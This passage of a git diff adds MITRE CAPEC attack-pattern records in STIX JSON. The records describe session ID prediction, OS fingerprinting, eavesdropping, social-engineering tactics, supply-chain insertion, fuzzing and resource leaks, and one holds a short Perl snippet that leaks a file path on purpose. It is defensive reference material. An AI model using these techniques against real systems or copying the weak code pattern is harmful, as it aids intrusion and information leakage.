"http://cwe.mitre.org/data/definitions/331.html", + "external_id": "CWE-331" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html", + "external_id": "CWE-346" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/488.html", + "external_id": "CWE-488" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/539.html", + "external_id": "CWE-539" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/6.html", + "external_id": "CWE-6" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html", + "external_id": "CWE-285" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/384.html", + "external_id": "CWE-384" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html", + "external_id": "CWE-693" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/719.html", + "external_id": "CWE-719" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "Jetty before 4.2.27, 5.1 before 5.1.12, 6.0 before 6.0.2, and 6.1 before 6.1.0pre3 generates predictable session identifiers using java.util.random, which makes it easier for remote attackers to guess a session identifier through brute force attacks, bypass authentication requirements, and possibly conduct cross-site request forgery attacks. See also: CVE-2006-6969", + "mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication. See also: CVE-2001-1534" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target host uses session IDs to keep track of the users.", + "Session IDs are used to control access to resources.", + "The session IDs used by the target host are predictable. For example, the session IDs are generated using predictable information (e.g., time)." + ], + "x_capec_skills_required": { + "Low": "There are tools to brute force session ID. Those tools require a low level of knowledge.", + "Medium": "Predicting Session ID may require more computation work which uses advanced analysis such as statistical analysis." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--7b395458-e6d9-4581-8384-72ae813cc3d6.json b/capec/attack-pattern/attack-pattern--7b395458-e6d9-4581-8384-72ae813cc3d6.json new file mode 100644 index 0000000000..b97335e3dc --- /dev/null +++ b/capec/attack-pattern/attack-pattern--7b395458-e6d9-4581-8384-72ae813cc3d6.json @@ -0,0 +1,73 @@ +{ + "type": "bundle", + "id": "bundle--675e01dd-4ef3-47f6-87c0-212afcf25226", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--7b395458-e6d9-4581-8384-72ae813cc3d6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "IP ID Sequencing Probe", + "description": "This OS fingerprinting probe analyzes the IP 'ID' field sequence number generation algorithm of a remote host. Operating systems generate IP 'ID' numbers differently, allowing an attacker to identify the operating system of the host by examining how is assigns ID numbers when generating response packets. RFC 791 does not specify how ID numbers are chosen or their ranges, so ID sequence generation differs from implementation to implementation. There are two kinds of IP 'ID' sequence number analysis - IP 'ID' Sequencing: analyzing the IP 'ID' sequence generation algorithm for one protocol used by a host and Shared IP 'ID' Sequencing: analyzing the packet ordering via IP 'ID' values spanning multiple protocols, such as between ICMP and TCP.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/317.html", + "external_id": "CAPEC-317" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "url": "http://www.faqs.org/rfcs/rfc793.html", + "external_id": "REF-128" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997", + "url": "http://phrack.org/issues/51/11.html", + "external_id": "REF-130" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--7b66655f-87f3-4eaa-8f61-ee8e2f23f6b9.json b/capec/attack-pattern/attack-pattern--7b66655f-87f3-4eaa-8f61-ee8e2f23f6b9.json new file mode 100644 index 0000000000..432b0f49cc --- /dev/null +++ b/capec/attack-pattern/attack-pattern--7b66655f-87f3-4eaa-8f61-ee8e2f23f6b9.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--8a61805e-f46e-4e0c-a907-c6b9c22e23b1", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--7b66655f-87f3-4eaa-8f61-ee8e2f23f6b9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Eavesdropping", + "description": "An adversary intercepts a form of communication (e.g. text, audio, video) by way of software (e.g., microphone and audio recording application), hardware (e.g., recording equipment), or physical means (e.g., physical proximity). The goal of eavesdropping is typically to gain unauthorized access to sensitive information about the target for financial, personal, political, or other gains. Eavesdropping is different from a sniffing attack as it does not take place on a network-based communication channel (e.g., IP traffic). Instead, it entails listening in on the raw audio source of a conversation between two or more parties.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/651.html", + "external_id": "CAPEC-651" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Confidentiality": [ + "Other (The adversary gains unauthorized access to information.)" + ] + }, + "x_capec_prerequisites": [ + "The adversary typically requires physical proximity to the target's environment, whether for physical eavesdropping or for placing recording equipment. This is not always the case for software-based eavesdropping, if the adversary has the capability to install malware on the target system that can activate a microphone and record audio digitally." + ], + "x_capec_resources_required": [ + "For logical eavesdropping, some equipment may be necessary (e.g., microphone, tape recorder, etc.). For physical eavesdropping, only proximity is required." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--7ba6022c-7bcb-4754-92d3-1334f628b343.json b/capec/attack-pattern/attack-pattern--7ba6022c-7bcb-4754-92d3-1334f628b343.json new file mode 100644 index 0000000000..a0f9496e96 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--7ba6022c-7bcb-4754-92d3-1334f628b343.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--7a8fd832-2630-4fc2-bab9-bbd530cd397c", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--7ba6022c-7bcb-4754-92d3-1334f628b343", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "name": "Black Box Reverse Engineering", + "description": "An attacker discovers the structure, function, and composition of a type of computer software through black box analysis techniques. 'Black Box' methods involve interacting with the software indirectly, in the absence of direct access to the executable object. Such analysis typically involves interacting with the software at the boundaries of where the software interfaces with a larger execution environment, such as input-output vectors, libraries, or APIs.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/189.html", + "external_id": "CAPEC-189" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_resources_required": [ + "Black box methods require (at minimum) the ability to interact with the functional boundaries where the software communicates with a larger processing environment, such as inter-process communication on a host operating system, or via networking protocols." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--7bd7fffc-51d4-46a3-8b37-da95f4dde0f1.json b/capec/attack-pattern/attack-pattern--7bd7fffc-51d4-46a3-8b37-da95f4dde0f1.json new file mode 100644 index 0000000000..3531aa93ae --- /dev/null +++ b/capec/attack-pattern/attack-pattern--7bd7fffc-51d4-46a3-8b37-da95f4dde0f1.json @@ -0,0 +1,66 @@ +{ + "type": "bundle", + "id": "bundle--60548262-4db0-4846-86f5-807c0c488db0", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--7bd7fffc-51d4-46a3-8b37-da95f4dde0f1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Application API Navigation Remapping", + "description": "An attacker manipulates either egress or ingress data from a client within an application framework in order to change the destination and/or content of links/buttons displayed to a user within API messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that looks authentic but contains links/buttons that point to an attacker controlled destination. Some applications make navigation remapping more difficult to detect because the actual HREF values of images, profile elements, and links/buttons are masked. One example would be to place an image in a user's photo gallery that when clicked upon redirected the user to an off-site location. Also, traditional web vulnerabilities (such as CSRF) can be constructed with remapped buttons or links. In some cases navigation remapping can be used for Phishing attacks or even means to artificially boost the page view, user site reputation, or click-fraud.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/386.html", + "external_id": "CAPEC-386" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/471.html", + "external_id": "CWE-471" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html", + "external_id": "CWE-345" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html", + "external_id": "CWE-346" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html", + "external_id": "CWE-602" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html", + "external_id": "CWE-311" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows a user to man-in-the-middle communications between the client and server, such as a man-in-the-middle proxy." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--7c095143-a5be-4327-b72d-d70d4641b5c1.json b/capec/attack-pattern/attack-pattern--7c095143-a5be-4327-b72d-d70d4641b5c1.json new file mode 100644 index 0000000000..f9c1d8a769 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--7c095143-a5be-4327-b72d-d70d4641b5c1.json @@ -0,0 +1,36 @@ +{ + "type": "bundle", + "id": "bundle--c97c09ff-b160-4ac1-9cf2-ae355c850658", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--7c095143-a5be-4327-b72d-d70d4641b5c1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Protocol Manipulation", + "description": "An adversary subverts a communications protocol to perform an attack. This type of attack can allow an adversary to impersonate others, discover sensitive information, control the outcome of a session, or perform other attacks. This type of attack targets invalid assumptions that may be inherent in implementers of the protocol, incorrect implementations of the protocol, or vulnerabilities in the protocol itself.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/272.html", + "external_id": "CAPEC-272" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_prerequisites": [ + "The protocol or implementations thereof must contain bugs that an adversary can exploit." + ], + "x_capec_resources_required": [ + "In some variants of this attack the adversary must be able to intercept communications using the protocol. This means they need to be able to receive the communications from one participant and prevent the other participant from receiving these communications." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--7c728533-b33c-4c10-b191-0f476ef9a375.json b/capec/attack-pattern/attack-pattern--7c728533-b33c-4c10-b191-0f476ef9a375.json new file mode 100644 index 0000000000..17ae5f210e --- /dev/null +++ b/capec/attack-pattern/attack-pattern--7c728533-b33c-4c10-b191-0f476ef9a375.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--84385a37-2980-4e9c-b6fe-f8c042673e74", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--7c728533-b33c-4c10-b191-0f476ef9a375", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Fuzzing and observing application log data/errors for application mapping", + "description": "An attacker sends random, malformed, or otherwise unexpected messages to a target application and observes the application's log or error messages returned. Fuzzing techniques involve sending random or malformed messages to a target and monitoring the target's response. The attacker does not initially know how a target will respond to individual messages but by attempting a large number of message variants they may find a variant that trigger's desired behavior. In this attack, the purpose of the fuzzing is to observe the application's log and error messages, although fuzzing a target can also sometimes cause the target to enter an unstable state, causing a crash. By observing logs and error messages, the attacker can learn details about the configuration of the target application and might be able to cause the target to disclose sensitive information.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/215.html", + "external_id": "CAPEC-215" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/209.html", + "external_id": "CWE-209" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/532.html", + "external_id": "CWE-532" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Other (Information Leakage)" + ] + }, + "x_capec_example_instances": [ + "\n The following code generates an error message that leaks the full pathname of the configuration file.\n $ConfigDir = \"/home/myprog/config\";$uname = GetUserInput(\"username\");ExitError(\"Bad hacker!\") if ($uname !~ /^\\w+$/);$file = \"$ConfigDir/$uname.txt\";if (! (-e $file)) { ExitError(\"Error: $file does not exist\"); }...\n If this code is running on a server, such as a web application, then the person making the request should not know what the full pathname of the configuration directory is. By submitting a username that does not produce a $file that exists, an attacker could get this pathname. It could then be used to exploit path traversal or symbolic link following problems that may exist elsewhere in the application.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target application must fail to sanitize incoming messages adequately before processing." + ], + "x_capec_resources_required": [ + "Fuzzing tools, which automatically generate and send message variants, are necessary for this attack. The attacker must have sufficient access to send messages to the target. The attacker must also have the ability to observe the target application's log and/or error messages in order to collect information about the target." + ], + "x_capec_skills_required": { + "Medium": "Although fuzzing parameters is not difficult, and often possible with automated fuzzing tools, interpreting the error conditions and modifying the parameters so as to move further in the process of mapping the application requires detailed knowledge of target platform, the languages and packages used as well as software design." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--7dcafaaa-e2a9-4b76-81eb-92f83fabf375.json b/capec/attack-pattern/attack-pattern--7dcafaaa-e2a9-4b76-81eb-92f83fabf375.json new file mode 100644 index 0000000000..0586389eee --- /dev/null +++ b/capec/attack-pattern/attack-pattern--7dcafaaa-e2a9-4b76-81eb-92f83fabf375.json @@ -0,0 +1,36 @@ +{ + "type": "bundle", + "id": "bundle--2ec14cf9-3628-4b91-af8b-dd4a6e77f949", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--7dcafaaa-e2a9-4b76-81eb-92f83fabf375", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "Infrastructure Manipulation", + "description": "An attacker exploits characteristics of the infrastructure of a network entity in order to perpetrate attacks or information gathering on network objects or effect a change in the ordinary information flow between network objects. Most often, this involves manipulation of the routing of network messages so, instead of arriving at their proper destination, they are directed towards an entity of the attackers' choosing, usually a server controlled by the attacker. The victim is often unaware that their messages are not being processed correctly. For example, a targeted client may believe they are connecting to their own bank but, in fact, be connecting to a Pharming site controlled by the attacker which then collects the user's login information in order to hijack the actual bank account.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/161.html", + "external_id": "CAPEC-161" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_prerequisites": [ + "The targeted client must access the site via infrastructure that the attacker has co-opted and must fail to adequately verify that the communication channel is operating correctly (e.g. by verifying that they are, in fact, connected to the site they intended.)" + ], + "x_capec_resources_required": [ + "The attacker must be able to corrupt the infrastructure used by the client. For some variants of this attack, the attacker must be able to stand up their own services that mimic the services the targeted client intends to use." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--7e1b1f24-f4a7-4fe3-9679-3d93fe3a4690.json b/capec/attack-pattern/attack-pattern--7e1b1f24-f4a7-4fe3-9679-3d93fe3a4690.json new file mode 100644 index 0000000000..89785a9031 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--7e1b1f24-f4a7-4fe3-9679-3d93fe3a4690.json @@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--f8d3a0ca-5aae-43ad-bde0-1d59807ccf85", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--7e1b1f24-f4a7-4fe3-9679-3d93fe3a4690", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence Perception of Scarcity", + "description": "The adversary leverages a perception of scarcity to persuade the target to perform an action or divulge information that is advantageous to the adversary. By conveying a perception of scarcity, or a situation of limited supply, the adversary aims to create a sense of urgency in the context of a target's decision-making process.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/420.html", + "external_id": "CAPEC-420" + }, + { + "source_name": "reference_from_CAPEC", + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "url": "http://www.social-engineer.org", + "external_id": "REF-348" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_example_instances": [ + "An adversary sends an email to a target about a limited-time opportunity to claim a considerable monetary reward. The email contains a link to a site which the adversary says is only active for a short time and to the first person to claim it. By convincing the user of the scarcity of the monetary reward, the adversary aims to persuade them to click on the malicious link in the email." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--7ea3ee8d-ccf6-4b18-a430-4f610ae246fb.json b/capec/attack-pattern/attack-pattern--7ea3ee8d-ccf6-4b18-a430-4f610ae246fb.json new file mode 100644 index 0000000000..b6d4de03f1 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--7ea3ee8d-ccf6-4b18-a430-4f610ae246fb.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--89b1f56d-5edf-4c19-b80e-166585fadbee", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--7ea3ee8d-ccf6-4b18-a430-4f610ae246fb", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Malicious Logic Insertion into Product Software via Inclusion of 3rd Party Component Dependency", + "description": "An adversary conducts supply chain attacks by the inclusion of insecure 3rd party components into a technology, product, or code-base, possibly packaging a malicious driver or component along with the product before shipping it to the consumer or acquirer. The result is a window of opportunity for exploiting the product or software until the insecure component is discovered. This supply chain threat can result in the installation of software that introduces widespread security vulnerabilities within an organization. One example could be the inclusion of an exploitable DLL (Dynamic Link Library) included within an antivirus technology. Because software often depends upon a large number of interdependent libraries and components to be present, security holes can be introduced merely by installing COTS software that comes pre-packaged with the components required for it to operate.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/446.html", + "external_id": "CAPEC-446" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Information Technology Laboratory, Supply Chain Risk Management (SCRM), 2010, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Access to the software during the development phase. This access is often obtained via insider access to include the 3rd party component after deployment." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--7ef5bd70-f893-4add-a0cb-56e61e5deb1d.json b/capec/attack-pattern/attack-pattern--7ef5bd70-f893-4add-a0cb-56e61e5deb1d.json new file mode 100644 index 0000000000..9cbb4bb974 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--7ef5bd70-f893-4add-a0cb-56e61e5deb1d.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--d3fff450-6e88-4dc9-ae83-31c04966e9e7", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--7ef5bd70-f893-4add-a0cb-56e61e5deb1d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence Perception of Commitment and Consistency", + "description": "An adversary uses social engineering to convince the target to do minor tasks as opposed to larger actions. After complying with a request, individuals are more likely to agree to subsequent requests that are similar in type and required effort.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/422.html", + "external_id": "CAPEC-422" + }, + { + "source_name": "reference_from_CAPEC", + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "url": "http://www.social-engineer.org", + "external_id": "REF-348" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--7f7b1917-63bb-43a7-b36b-a90dbc6072e5.json b/capec/attack-pattern/attack-pattern--7f7b1917-63bb-43a7-b36b-a90dbc6072e5.json new file mode 100644 index 0000000000..a81379c34b --- /dev/null +++ b/capec/attack-pattern/attack-pattern--7f7b1917-63bb-43a7-b36b-a90dbc6072e5.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--9276055a-0934-4bc9-a1a0-c027bdb15674", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--7f7b1917-63bb-43a7-b36b-a90dbc6072e5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Resource Leak Exposure", + "description": "An adversary utilizes a resource leak on the target to deplete the quantity of the resource available to service legitimate requests. Resource leaks most often come in the form of memory leaks where memory is allocated but never released after it has served its purpose, however, theoretically, any other resource that can be reserved can be targeted if the target fails to release the reservation when the reserved resource block is no longer needed. In this attack, the adversary determines what activity results in leaked resources and then triggers that activity on the target. Since some leaks may be small, this may require a large number of requests by the adversary. However, this attack differs from a flooding attack in that the rate of requests is generally not significant. This is because the lost resources due to the leak accumulate until the target is reset, usually by restarting it. Thus, a resource-poor adversary who would be unable to flood the target can still utilize this attack. Resource depletion through leak differs from resource depletion through allocation in that, in the former, the adversary may not be able to control the size of each leaked allocation, but instead allows the leak to accumulate until it is large enough to affect the target's performance. When depleting resources through allocation, the allocated resource may eventually be released by the target so the attack relies on making sure that the allocation size itself is prohibitive of normal operations by the target.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/131.html", + "external_id": "CAPEC-131" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html", + "external_id": "CWE-404" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (A successful resource leak exposure attack compromises the availability of the target system's services.)", + "Resource Consumption (A successful resource leak exposure attack compromises the availability of the target system's services.)" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target must have a resource leak that the adversary can repeatedly trigger." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--7fd466e3-0437-45f6-8cdc-0d9de4a4df92.json b/capec/attack-pattern/attack-pattern--7fd466e3-0437-45f6-8cdc-0d9de4a4df92.json new file mode 100644 index 0000000000..977c7d1d76 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--7fd466e3-0437-45f6-8cdc-0d9de4a4df92.json @@ -0,0 +1,125 @@ +{ + "type": "bundle", + "id": "bundle--f1d5da19-c520-48aa-82a4-baab55aca028", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--7fd466e3-0437-45f6-8cdc-0d9de4a4df92", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Leverage Executable Code in Non-Executable Files", + "description": 